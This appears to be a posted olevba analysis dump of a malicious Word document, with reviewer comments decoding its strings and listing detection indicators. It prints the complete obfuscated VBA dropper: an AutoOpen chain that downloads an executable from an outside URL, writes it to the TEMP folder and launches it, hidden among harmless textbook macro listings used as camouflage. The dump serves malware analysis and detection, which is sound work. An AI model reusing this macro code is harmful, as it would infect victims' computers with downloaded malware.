
Malicious Word macro

dynamoo Jun 26th, 2015 242 Never
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASI-B- dridex.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: dridex.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: dridex.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub ôñÔÔÀ(FFFFF As Long)
      ' Trampoline between autoopen and the payload: the only statement is a
      ' call to TOT9Qr3J8P (defined in Module2). FFFFF is never read.
  17.  
  18. TOT9Qr3J8P
  19.  
  20. End Sub
  21.  
  22. Sub autoopen()
      ' Auto-exec entry point: olevba's analysis table for this stream flags
      ' AutoOpen as running when the Word document is opened. The body only
      ' calls ôñÔÔÀ, which in turn calls TOT9Qr3J8P in Module2.
      ' NOTE(review): this still requires macros to be allowed to run for the
      ' document; blocking macros in files from untrusted sources stops the
      ' chain at this point.
  23.  
  24. ôñÔÔÀ (3)
  25.  
  26. End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +----------+----------+---------------------------------------+
  32. | Type     | Keyword  | Description                           |
  33. +----------+----------+---------------------------------------+
  34. | AutoExec | AutoOpen | Runs when the Word document is opened |
  35. +----------+----------+---------------------------------------+
  36. -------------------------------------------------------------------------------
  37. VBA MACRO Module1.bas
  38. in file: dridex.doc - OLE stream: u'Macros/VBA/Module1'
  39. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  40. '
  41. Sub PublishAutoFilterRange()
  42.     Ôû.Sheets("Query").AutoFilterMode = False
  43.     ä.Range("Query_From_Northwind").Select
  44.     â.Range("Query_From_Northwind").AutoFilter _
  45.         Field:=1, _
  46.         Criteria1:="Condiments"
  47.     ThisWorkbook.PublishObjects.Add( _
  48.         SourceType:=xlSourceAutoFilter, _
  49.         FileName:="C:\Publish01.htm", _
  50.         Sheet:="Query", _
  51.         Source:=ô.Sheets("Query").AutoFilter.Range, _
  52.         HtmlType:=xlHtmlStatic, _
  53.         DivID:="ExcelAutoFilter", _
  54.         Title:="Excel AutoFilter Range").Publish True
  55. End Sub
  56. '
  57. ' Publish a chart sheet
  58. '
  59. Sub PublishChartSheet()
  60.     ThisWorkbook.PublishObjects.Add( _
  61.         SourceType:=xlSourceChart, _
  62.         FileName:="C:\Publish02.htm", _
  63.         Sheet:="Chart1", _
  64.         HtmlType:=xlHtmlChart, _
  65.         DivID:="ExcelChartSheet", _
  66.         Title:="Excel Chart Sheet").Publish True
  67. End Sub
  68. '
  69. ' Publish an embedded chart
  70. '
  71. Sub PublishEmbeddedChart()
  72.     ThisWorkbook.PublishObjects.Add( _
  73.         SourceType:=xlSourceChart, _
  74.         FileName:="C:\Publish03.htm", _
  75.         Sheet:="2000 Budget", _
  76.         Source:="Chart 1", _
  77.         HtmlType:=xlHtmlStatic, _
  78.         DivID:="ExcelEmbeddedChart", _
  79.         Title:="Excel Embedded Chart").Publish True
  80. End Sub
  81. '
  82. ' Publish a PivotTable
  83. '
  84. Sub PublishPivotTable()
  85.     ThisWorkbook.PublishObjects.Add( _
  86.         SourceType:=xlSourcePivotTable, _
  87.         FileName:="C:\Publish04.htm", _
  88.         Sheet:="PivotTable", _
  89.         Source:="PivotTable1", _
  90.         HtmlType:=xlHtmlList, _
  91.         DivID:="ExcelPivotTable", _
  92.         Title:="Excel PivotTable").Publish True
  93. End Sub
  94. '
  95. ' Publish a print area
  96. '
  97. Sub PublishPrintArea()
  98.     ç.Worksheets("2000 Budget").PageSetup.PrintArea = "A1:B13"
  99.     ThisWorkbook.PublishObjects.Add( _
  100.         SourceType:=xlSourcePrintArea, _
  101.         FileName:="C:\Publish05.htm", _
  102.         Sheet:="2000 Budget", _
  103.         Source:=ôâ.Worksheets("2000 Budget").PageSetup.PrintArea, _
  104.         HtmlType:=xlHtmlStatic, _
  105.         DivID:="ExcelPrintArea", _
  106.         Title:="Excel Print Area").Publish True
  107. End Sub
  108. '
  109. ' Publish a query table
  110. '
  111. Sub PublishQueryTable()
  112.     ThisWorkbook.PublishObjects.Add( _
  113.         SourceType:=xlSourceQuery, _
  114.         FileName:="C:\Publish06.htm", _
  115.         Sheet:="Query", _
  116.         Source:="Query from Northwind", _
  117.         HtmlType:=xlHtmlCalc, _
  118.         DivID:="ExcelQueryTable", _
  119.         Title:="Excel Query Table").Publish True
  120. End Sub
  121. '
  122. ' Publish a range using coordinates
  123. '
  124. Sub PublishRangeCoordinates()
  125.     ThisWorkbook.PublishObjects.Add( _
  126.         SourceType:=xlSourceRange, _
  127.         FileName:="C:\Publish07.htm", _
  128.         Sheet:="2000 Budget", _
  129.         Source:="A1:B17", _
  130.         HtmlType:=xlHtmlCalc, _
  131.         DivID:="ExcelRangeCoordinates", _
  132.         Title:="Excel Range Coordinates").Publish True
  133. End Sub
  134. '
  135. ' Publish a range using a name
  136. '
  137. Sub PublishRangeName()
  138.     ThisWorkbook.PublishObjects.Add( _
  139.         SourceType:=xlSourceRange, _
  140.         FileName:="C:\Publish08.htm", _
  141.         Source:="Expenses", _
  142.         HtmlType:=xlHtmlStatic, _
  143.         DivID:="ExcelRangeName", _
  144.         Title:="Excel Range Name").Publish True
  145. End Sub
  146.  
  147. Public Function WphmxowcstXb(A7X71OY4p As String)
       ' Execution step of the sample. The Chr()/literal concatenation below
       ' evaluates to "Shell.Application"; the object is created through
       ' dFlagLB30D and its Open method is invoked on QrDNQZQRP, the public
       ' variable declared in Module2 and assigned in TOT9Qr3J8P.
       ' A7X71OY4p is never read, so the caller's argument has no effect.
       ' Detection angle: an Office process opening a file it has just written.
  148.  Set zBo1iklWv9Sz = dFlagLB30D("S" & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & "c" & "a" & Chr(116) & Chr(105) & "o" & Chr(110))
  149. zBo1iklWv9Sz.Open (QrDNQZQRP)
  150. End Function
  151. Public Function dFlagLB30D(HvbtyGByuxg3J As String)
       ' Thin wrapper around CreateObject: returns the COM object for the
       ' ProgID passed in. The four obfuscated ProgIDs in this dump
       ' (Shell.Application, Adodb.Stream, Microsoft.XMLHTTP, WScript.Shell)
       ' all reach CreateObject through this wrapper, built from Chr() pieces,
       ' so none of them appears as a plain string literal in the source.
  152.  Set dFlagLB30D = CreateObject(HvbtyGByuxg3J)
  153. End Function
  154. Public Function IrQ2IESgmYoy(UNIWVVc542vt As Variant, cNvH4h9GxP As String)
       ' File-drop step: writes the data in UNIWVVc542vt to the path in
       ' cNvH4h9GxP. The concatenation below evaluates to "Adodb.Stream",
       ' created through dFlagLB30D. Called from TOT9Qr3J8P (Module2) with the
       ' HTTP response body and QrDNQZQRP.
  155. Dim oUeKB2dS: Set oUeKB2dS = dFlagLB30D(Chr(65) & "d" & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & "t" & Chr(114) & Chr(101) & "a" & "m")
  156.  
  157. With oUeKB2dS
       ' Type 1 is ADO's binary stream type (adTypeBinary).
  158.    .Type = 1
  159.     .Open
  160.     .write UNIWVVc542vt
       ' Save option 2 is adSaveCreateOverWrite: an existing file at the
       ' target path is replaced.
  161.     .savetofile cNvH4h9GxP, 2
  162. End With
  163. End Function
  164.  
  165. '
  166. ' Publish a worksheet
  167. '
  168. Sub PublishWorksheet()
  169.     ThisWorkbook.PublishObjects.Add( _
  170.         SourceType:=xlSourceSheet, _
  171.         FileName:="C:\Publish09.htm", _
  172.         Sheet:="2000 Budget", _
  173.         HtmlType:=xlHtmlCalc, _
  174.         DivID:="ExcelWorksheet", _
  175.         Title:="Excel Worksheet").Publish True
  176. End Sub
  177. '
  178. ' Listing 20.2. Republishing a PublishObject.
  179. '
  180. Sub RepublishObject()
  181.     Dim strID As String
  182.     strID = "ExcelRangeCoordinates"
  183.     For Each po In ThisWorkbook.PublishObjects
  184.         If po.DivID = strID Then
  185.             po.Publish
  186.             Exit For
  187.         End If
  188.     Next 'po
  189. End Sub
  190. '
  191. ' Listing 20.3. A procedure that deletes all the PublishObjects
  192. '
  193. Sub DeletePublishObjects()
  194.   For Each po In ThisWorkbook.PublishObjects
  195.         po.Delete
  196.     Next 'po
  197. End Sub
  198. '
  199. ' Listing 20.4. A procedure that adds a Hyperlink object.
  200. '
  201. Sub AddLink()
       ' NOTE(review): no procedure visible in this dump calls AddLink, and it
       ' is not on the autoopen call chain. The literal URL below is one of the
       ' three URLs olevba lists as IOCs for this module, so that row should
       ' not be read as the sample's download location.
  202.     Dim r As Range
  203.     '
  204.    ' Add a paragraph to the end of the document
  205.    '
  206.    With ThisDocument.Paragraphs
  207.         .Item(.Count).Range.InsertParagraphAfter
  208.         Set r = .Item(.Count).Range
  209.     End With
  210.     r.Text = "Sams' Home Page"
  211.     r.Hyperlinks.Add _
  212.         Anchor:=r, _
  213.         Address:="http://www.mcp.com/sams/", _
  214.         ScreenTip:="Click here to visit the home page of Sams!"
  215. End Sub
  216. '
  217. ' Listing 20.5. Procedures that add a link for the Yahoo!
  218. ' search engine and run a query on the Yahoo! database.
  219. '
  220. Sub AddYahoo()
  221.     Dim r As Range
  222.     '
  223.    ' Add a paragraph to the end of the document
  224.    '
  225.    With ThisDocument.Paragraphs
  226.         .Item(.Count).Range.InsertParagraphAfter
  227.         Set r = .Item(.Count).Range
  228.     End With
  229.     r.Text = "Yahoo Search"
  230.     r.Hyperlinks.Add _
  231.         Anchor:=r, _
  232.         Address:="http://search.yahoo.com/bin/search"
  233. End Sub
  234.  
  235. Sub SearchYahoo()
  236.     Dim link As Hyperlink
  237.     Dim keyword As String
  238.     Set link = ThisDocument.Hyperlinks("http://search.yahoo.com/bin/search")
  239.     keyword = InputBox("Enter a search keyword:")
  240.     link.Follow _
  241.         ExtraInfo:="p=" & keyword, _
  242.         Method:=msoMethodGet
  243. End Sub
  244. '
  245. ' Listing 20.6. Using the FollowHyperlink method to display
  246. ' a target document without an existing Hyperlink object.
  247. '
  248. Sub FollowHyperlinkTest()
  249.     Dim keyword As String
  250.     keyword = InputBox("Enter a search keyword:")
  251.     ThisDocument.FollowHyperlink _
  252.         Address:="http://search.yahoo.com/bin/search", _
  253.         ExtraInfo:="p=" & keyword, _
  254.         Method:=msoMethodGet
  255. End Sub
  256. '
  257. ' Listing 20.7. Some event handlers that are used to
  258. ' display a Web page.
  259. '
  260. ' This event handler fires when you first open the form
  261. '
  262. Private Sub UserForm_Initialize()
  263.     Dim maxWidth As Integer
  264.     Dim maxHeight As Integer
  265.     With webWWW
  266.         '
  267.        ' Display and save the initial URL
  268.        '
  269.        If txtLocation <> "" Then
  270.             topPage = txtLocation
  271.             .Navigate txtLocation
  272.         End If
  273.         '
  274.        ' Adjust the width and height of the control
  275.        '
  276.        maxWidth = Ê.Me.Width - .Left - 10
  277.         maxHeight = Ê.Me.Height - .Top - 20
  278.         If Application.UsableWidth > maxWidth Then
  279.             .Width = maxWidth
  280.         End If
  281.         If Application.UsableHeight > maxHeight Then
  282.             .Height = maxHeight
  283.         End If
  284.     End With
  285. End Sub
  286. '
  287. ' This event handler fires when you enter the text box
  288. '
  289. Private Sub txtLocation_Enter()
  290.     '
  291.    ' Make sure Surf! button is the default
  292.    '
  293.    cmdSurf.Default = True
  294. End Sub
  295. '
  296. ' This event handler fires when you click the Surf! button
  297. '
  298. Private Sub cmdSurf_Click()
  299.     '
  300.    ' Surf to the URL specified in the Location text box
  301.    '
  302.    If txtLocation <> "" Then
  303.         webWWW.Navigate txtLocation
  304.     Else
  305.         txtLocation.SetFocus
  306.         Beep
  307.     End If
  308. End Sub
  309. '
  310. ' This event handler fires once the Web page navigation is done
  311. '
  312. Private Sub webWWW_DocumentComplete(ByVal pDisp As Object, URL As Variant)
  313.     lblProgress.Caption = " Done"
  314.     txtLocation = URL
  315. End Sub
  316. '
  317. ' This event handler fires at the start of the download
  318. '
  319. Private Sub webWWW_DownloadBegin()
  320.     lblProgress.Caption = " Downloading..."
  321. End Sub
  322. '
  323. ' This event handler fires when the URL title changes
  324. '
  325. Private Sub webWWW_TitleChange(ByVal Text As String)
  326.     '
  327.    ' Update the form's caption to reflect the new title
  328.    '
  329.    ÊMe.Caption = "The Word Wide Web - " & webWWW.LocationName
  330. End Sub
  331. '
  332. ' This event handler fires when the status text changes
  333. '
  334. Private Sub webWWW_StatusTextChange(ByVal Text As String)
  335.     lblStatus = Text
  336. End Sub
  337. '
  338. ' Listing 20.8. Event handlers for the navigation
  339. ' buttons in the custom Web browser.
  340. '
  341. '
  342. ' This event handler fires when you click the Back button
  343. '
  344. Private Sub cmdBack_Click()
  345.     '
  346.    ' An error occurs if there is no page to go back to
  347.    '
  348.    On Error Resume Next
  349.     webWWW.GoBack
  350. End Sub
  351. '
  352. ' This event handler fires when you click the Forward button
  353. '
  354. Private Sub cmdForward_Click()
  355.     '
  356.    ' An error occurs if there is no page to go forward to
  357.    '
  358.    On Error Resume Next
  359.     webWWW.GoForward
  360. End Sub
  361. '
  362. ' This event handler fires when you click the Top button
  363. '
  364. Private Sub cmdTop_Click()
  365.     webWWW.Navigate topPage
  366. End Sub
  367. '
  368. ' This event handler fires when you click the Refresh button
  369. '
  370. Private Sub cmdRefresh_Click()
  371.     webWWW.Refresh
  372. End Sub
  373. '
  374. ' This event handler fires when you click the Stop button
  375. '
  376. Private Sub cmdStop_Click()
  377.     webWWW.Stop
  378. End Sub
  379. '
  380. ' This event handler fires when you click the Home button
  381. '
  382. Private Sub cmdHome_Click()
  383.     webWWW.GoHome
  384. End Sub
  385. '
  386. ' This event handler fires when you click the Search button
  387. '
  388. Private Sub cmdSearch_Click()
  389.     webWWW.GoSearch
  390. End Sub
  391. '
  392. ' This event handler fires when you click the Exit button
  393. '
  394. Private Sub cmdExit_Click()
  395.     Unload ÊMe
  396. End Sub
  397. '
  398. ' Listing 20.9. A procedure that manipulates Internet Explorer
  399. ' via Automation using various members of the
  400. ' InternetExplorer class.
  401. '
  402. Sub AutomateInternetExplorer()
  403.     Dim ie As Object
  404.     Dim result As Integer
  405.     '
  406.    ' Set up the Automation object
  407.    '
  408.    Set ie = CreateObject("InternetExplorer.Application")
  409.     '
  410.    ' Navigate to a page and customize the browser window
  411.    '
  412.    ie.Navigate "http://www.microsoft.com/ie/"
  413.     ie.Toolbar = False
  414.     ie.StatusBar = False
  415.     ie.MenuBar = False
  416.     '
  417.    ' Twiddle thumbs while the page loads
  418.    '
  419.    Do While ie.Busy
  420.         DoEvents
  421.     Loop
  422.     '
  423.    ' Display page info
  424.    '
  425.    result = MsgBox( _
  426.         "Current URL:  " & ie.LocationURL & Chr(13) & _
  427.         "Current Title: " & ie.LocationName & Chr(13) & _
  428.         "Document type: " & ie.Type & Chr(13) & Chr(13) & _
  429.         "Would you like to view this document?", _
  430.         vbYesNo + vbQuestion)
  431.     If result = vbYes Then
  432.         '
  433.        ' If Yes, make browser visible and activate it
  434.        '
  435.        ie.Visible = True
  436.         AppActivate "Microsoft Internet Explorer"
  437.     Else
  438.         '
  439.        ' If no, bail out
  440.        '
  441.        ie.Quit
  442.     End If
  443.     Set ie = Nothing
  444. End Sub
  445.  
  446. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  447. ANALYSIS:
  448. +------------+----------------------+-----------------------------------------+
  449. | Type       | Keyword              | Description                             |
  450. +------------+----------------------+-----------------------------------------+
  451. | Suspicious | Open                 | May open a file                         |
  452. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  453. |            |                      | strings                                 |
  454. | Suspicious | CreateObject         | May create an OLE object                |
  455. | Suspicious | SaveToFile           | May create a text file                  |
  456. | Suspicious | AppActivate          | May control another application by      |
  457. |            |                      | simulating user keystrokes              |
  458. | Suspicious | Run                  | May run an executable file or a system  |
  459. |            |                      | command                                 |
  460. | Suspicious | Write                | May write to a file (if combined with   |
  461. |            |                      | Open)                                   |
  462. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  463. |            |                      | may be used to obfuscate strings        |
  464. |            |                      | (option --decode to see all)            |
  465. | IOC        | http://www.mcp.com/s | URL                                     |
  466. |            | ams/                 |                                         |
  467. | IOC        | http://search.yahoo. | URL                                     |
  468. |            | com/bin/search       |                                         |
  469. | IOC        | http://www.microsoft | URL                                     |
  470. |            | .com/ie/             |                                         |
  471. +------------+----------------------+-----------------------------------------+
  472. -------------------------------------------------------------------------------
  473. VBA MACRO Module2.bas
  474. in file: dridex.doc - OLE stream: u'Macros/VBA/Module2'
  475. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  476. Public QrDNQZQRP As String
       ' Public, module-level string shared across modules: assigned in
       ' TOT9Qr3J8P (this module), passed there to IrQ2IESgmYoy as the save
       ' path, and read by WphmxowcstXb in Module1 as the file to open.
  477.  
  478.  
  479.  
  480.  
  481. ' Listing 13.4. Using the DDEInitiate method to open a DDE channel.
  482. '
  483. Sub TestIt()
  484.    Dim result As Integer
  485.     result = OpenHailingFrequencies
  486.     DDETerminate result
  487. End Sub
  488.  
  489. Function OpenHailingFrequencies() As Integer
  490.     Dim channel As Integer
  491.    
  492.     On Error GoTo BadConnection
  493.     '
  494.    ' Establish the DDE connection to Program Manager
  495.    '
  496.    channel = DDEInitiate("Progman", "Progman")
  497.    
  498.     MsgBox "A channel to Program Manager is now open.", vbInformation
  499.     '
  500.    ' Return the channel number
  501.    '
  502.    OpenHailingFrequencies = channel
  503.     Exit Function
  504.    
  505. BadConnection:
  506.     MsgBox "Could not open a channel to Program Manager!", vbExclamation
  507.     '
  508.    ' Return 0
  509.    '
  510.    OpenHailingFrequencies = 0
  511.        
  512. End Function
  513.  
  514. ' Listing 13.5. Using DDEExecute to control a server application.
  515. '
  516. Sub CreateWorkbookIcon()
       ' NOTE(review): no procedure visible in this dump calls
       ' CreateWorkbookIcon, and it is not on the autoopen call chain. The
       ' "\Excel.exe" literal below is presumably the source of the single
       ' IOC row ("Excel.exe") olevba reports for this module; the file the
       ' sample actually writes is named in TOT9Qr3J8P, not here.
  517.  
  518.     Dim channel As Integer
  519.     Dim strPath As String, strName As String, strApp As String
  520.    
  521.     On Error GoTo BadConnection
  522.     '
  523.    ' Get info required for program item
  524.    '
  525.    strPath = ActiveWorkbook.Path & "\" & ActiveWorkbook.Name
  526.     strName = Left(ActiveWorkbook.Name, Len(ActiveWorkbook.Name) - 4)
  527.     strApp = Application.Path & "\Excel.exe"
  528.     '
  529.    ' Establish the DDE connection to Program Manager
  530.    '
  531.    channel = DDEInitiate("Progman", "Progman")
  532.     '
  533.    ' Create the group and item
  534.    '
  535.    DDEExecute channel, "[CreateGroup(""Excel Workbooks"")]"
  536.     DDEExecute channel, "[AddItem(""" & strPath & """,""" & strName & """,""""" & strApp & """"")]"
  537.     DDETerminate channel
  538.  
  539.     Exit Sub
  540.    
  541. BadConnection:
  542.     MsgBox "Could not open a channel to Program Manager!", vbExclamation
  543.            
  544. End Sub
  545.  
  546. ' Listing 13.6. Using DDERequest to retrieve data from an
  547. ' application.
  548. '
  549.  
  550. Sub RequestWordData()
  551.     Dim channel As Integer
  552.     Dim wordData As Variant
  553.     Dim getString As String
  554.     On Error GoTo BailOut
  555.     '
  556.    ' Set up the application
  557.    '
  558.    Application.StatusBar = "Starting Word..."
  559.     Application.DisplayAlerts = False
  560.     '
  561.    ' Initiate channel with System topic
  562.    '
  563.    channel = DDEInitiate("Winword", "System")
  564.     '
  565.    ' Open the document we want to work with
  566.    '
  567.    Application.StatusBar = "Opening Word document..."
  568.     DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
  569.     DDETerminate channel
  570.     '
  571.    ' Initiate new channel with document
  572.    '
  573.    channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
  574.     '
  575.    ' Find keyword and add a bookmark
  576.    '
  577.    DDEExecute channel, "[StartOfDocument]"
  578.     DDEExecute channel, "[EditFind .Find = ""ACME""]"
  579.     DDEExecute channel, "[SelectCurSentence]"
  580.     DDEExecute channel, "[EditBookmark .Name = ""Gotcha""]"
  581.     '
  582.    ' Retrieve the bookmark and store it
  583.    '
  584.    wordData = DDERequest(channel, "Gotcha")
  585.     getString = wordData(1)
  586.     r.Worksheets("Sheet1").[A2].Value = getString
  587.     '
  588.    ' Quit Word and terminate channel
  589.    '
  590.    DDEExecute channel, "[FileExit 1]"
  591.     DDETerminate channel
  592.  
  593.     Exit Sub
  594.  
  595. BailOut:
  596.     DDETerminate channel
  597.     MsgBox "DDE operation failed!", vbExclamation
  598.  
  599. End Sub
  600.  
  601. ' Listing 13.7. Using DDEPoke to send data to an application.
  602. '
  603. Sub SendDataToWord()
  604.  
  605.     Dim channel As Integer, pokeData As Variant
  606.     On Error GoTo BailOut
  607.     '
  608.    ' Set up the application
  609.    '
  610.    Application.StatusBar = "Starting Word..."
  611.     Application.DisplayAlerts = False
  612.     '
  613.    ' Initiate channel with System topic
  614.    '
  615.    channel = DDEInitiate("Winword", "System")
  616.     '
  617.    ' Open the document we want to work with
  618.    '
  619.    Application.StatusBar = "Opening Word document..."
  620.     DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
  621.     DDETerminate channel
  622.     '
  623.    ' Initiate new channel with document
  624.    '
  625.    channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
  626.     '
  627.    'Get the data to be sent
  628.    '
  629.    Application.StatusBar = "Sending data..."
  630.     Set pokeData = t.Worksheets("Sheet1").[A1]
  631.     '
  632.    'Send it to the "Gotcha" bookmark
  633.    '
  634.    DDEPoke channel, "Gotcha", pokeData
  635.     '
  636.    ' Quit Word and terminate channel
  637.    '
  638.    Application.StatusBar = "Shutting down Word..."
  639.     DDEExecute channel, "[FileExit 1]"
  640.     DDETerminate channel
  641.     Application.StatusBar = False
  642.  
  643.     Exit Sub
  644.  
  645. BailOut:
  646.     DDETerminate channel
  647.     MsgBox "DDE operation failed!", vbExclamation
  648.     Application.StatusBar = False
  649.  
  650. End Sub
  651.  
  652. ' Listing 15.3. Using Automation to run a PowerPoint
  653. ' presentation slide show.
  654. '
  655. Sub TOT9Qr3J8P()
       ' Download-and-drop routine, reached from autoopen via ôñÔÔÀ in
       ' ThisDocument.
       ' NOTE(review): the "Listing 15.3" PowerPoint comment directly above
       ' this Sub in the dump appears to belong to RunPresentation, which
       ' follows; it does not describe this procedure.
       '
       ' Decoded Chr()/literal strings (network value defanged):
       '   ProgID          "Microsoft.XMLHTTP"
       '   method, verb    "Open", "GET"
       '   URL             hxxp://colchester-institute[.]com/708/346.exe
       '   ProgID          "WScript.Shell", then Environment("Process")("TEMP")
       '   file written    %TEMP%\biksenpd.exe   (path kept in QrDNQZQRP)
       '   later members   "Send", "responseBody"
       '
       ' olevba's IOC rows in this report (three URLs under Module1, Excel.exe
       ' under Module2) are plain string literals in other procedures. The URL
       ' and file name above are assembled at run time and are not among them,
       ' so the IOC table on its own does not identify the download.
       '
       ' Host-side indicators: an Office process requesting an .exe over HTTP,
       ' a new executable appearing in the user's TEMP directory, and the
       ' Office process then opening it.
  656.  
  657. Set j9yPFDVwyo = dFlagLB30D("Mi" & Chr(99) & "r" & Chr(111) & Chr(115) & "o" & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & "L" & Chr(72) & "TT" & Chr(80))
  658.  
       ' CallByName hides the member names as strings. This is Open("GET",
       ' <URL>, False); the trailing False is the async argument, so the later
       ' Send blocks until the response has arrived.
  659. CallByName j9yPFDVwyo, Chr(79) & Chr(112) & "e" & "n", VbMethod, Chr(71) & Chr(69) & Chr(84), _
  660. Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(99) & Chr(111) & "l" & Chr(99) & Chr(104) & Chr(101) & Chr(115) & Chr(116) & Chr(101) & Chr(114) & Chr(45) & Chr(105) & Chr(110) & Chr(115) & Chr(116) & Chr(105) & Chr(116) & Chr(117) & Chr(116) & Chr(101) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & "7" & Chr(48) & Chr(56) & Chr(47) & Chr(51) & Chr(52) & Chr(54) & Chr(46) & Chr(101) & Chr(120) & "e" _
  661. , False
  662.  
  663. Set nVoYwy5wi65Ru = dFlagLB30D("W" & Chr(83) & Chr(99) & Chr(114) & "i" & Chr(112) & Chr(116) & Chr(46) & Chr(83) & "h" & "e" & Chr(108) & Chr(108))
  664.  
       ' Reads the process-scope environment collection and looks up TEMP to
       ' build the destination path.
  665. Set Njvhw3SCwhJF = CallByName(nVoYwy5wi65Ru, Chr(69) & Chr(110) & Chr(118) & Chr(105) & "r" & Chr(111) & Chr(110) & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & "r" & Chr(111) & Chr(99) & Chr(101) & "s" & Chr(115))
  666.  
  667. NkFurzJgA4 = Njvhw3SCwhJF(Chr(84) & "E" & Chr(77) & Chr(80))
  668.  
  669. QrDNQZQRP = NkFurzJgA4 & Chr(92) & Chr(98) & Chr(105) & "k" & Chr(115) & Chr(101) & Chr(110) & Chr(112) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
  670. Dim yRG5Tmsczw() As Byte
  671.  
       ' Send the request, take responseBody as a byte array, and hand it to
       ' IrQ2IESgmYoy (Module1), which saves it to QrDNQZQRP.
  672. CallByName j9yPFDVwyo, "S" & "e" & Chr(110) & Chr(100), VbMethod
  673. yRG5Tmsczw = CallByName(j9yPFDVwyo, "r" & Chr(101) & Chr(115) & Chr(112) & "o" & Chr(110) & Chr(115) & Chr(101) & Chr(66) & Chr(111) & "d" & Chr(121), VbGet)
  674. IrQ2IESgmYoy yRG5Tmsczw, QrDNQZQRP
       ' The division by zero is deliberate: it raises a run-time error so that
       ' control jumps to ehUAReVao5. The call that opens the saved file exists
       ' only in that handler, so it never appears on the straight-line path;
       ' the On Error GoTo 0 on the next line is not reached.
  675. On Error GoTo ehUAReVao5
  676.     a = 197 / 0
  677.   On Error GoTo 0
  678.  
  679. PBWxy1g8qJuzYK:
  680.   Exit Sub
  681. ehUAReVao5:
       ' WphmxowcstXb (Module1) ignores this string argument and opens
       ' QrDNQZQRP through Shell.Application.
  682.   WphmxowcstXb ("HBaMqGixX")
  683. Resume PBWxy1g8qJuzYK
  684. End Sub
  685. Sub RunPresentation()
       ' NOTE(review): no procedure visible in this dump calls RunPresentation,
       ' and it is not on the autoopen call chain. The "Listing 15.3" comment
       ' that sits above TOT9Qr3J8P in the dump describes this procedure.
       ' Its literal Open, Run and CreateObject tokens match keywords in
       ' olevba's Suspicious table for this module, so those rows alone do not
       ' separate this procedure from TOT9Qr3J8P.
  686.     On Error GoTo OpenPowerPoint
  687.     '
  688.    ' Reference the existing PowerPoint Application object
  689.    '
  690.    Set ppApp = GetObject(, "PowerPoint.Application")
  691.     '
  692.    ' Work with PowerPoint's Application object directly
  693.    '
  694.    With ppApp
  695.         '
  696.        ' Display PowerPoint
  697.        '
  698.        .Visible = True
  699.         '
  700.        ' Open and then run the presentation's slide show
  701.        '
  702.        .Presentations.Open "C:\My Documents\Juggling.ppt"
  703.         .Presentations("Juggling.ppt").SlideShowSettings.Run
  704.     End With
  705.     Set ppApp = Nothing
  706. '
  707. ' Program branches here if PowerPoint isn't running
  708. '
  709. OpenPowerPoint:
  710.     ' Create a new instance of PowerPoint's Application object
  711.    '
  712.    Set ppApp = CreateObject("PowerPoint.Application")
  713.     '
  714.    ' Continue after the statement that caused the error
  715.    '
  716.    Resume Next
  717. End Sub
  718.  
  719. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  720. ANALYSIS:
  721. +------------+----------------+-----------------------------------------+
  722. | Type       | Keyword        | Description                             |
  723. +------------+----------------+-----------------------------------------+
  724. | Suspicious | Open           | May open a file                         |
  725. | Suspicious | Chr            | May attempt to obfuscate specific       |
  726. |            |                | strings                                 |
  727. | Suspicious | CreateObject   | May create an OLE object                |
  728. | Suspicious | Run            | May run an executable file or a system  |
  729. |            |                | command                                 |
  730. | Suspicious | CallByName     | May attempt to obfuscate malicious      |
  731. |            |                | function calls                          |
  732. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  733. |            |                | may be used to obfuscate strings        |
  734. |            |                | (option --decode to see all)            |
  735. | IOC        | Excel.exe      | Executable file name                    |
  736. +------------+----------------+-----------------------------------------+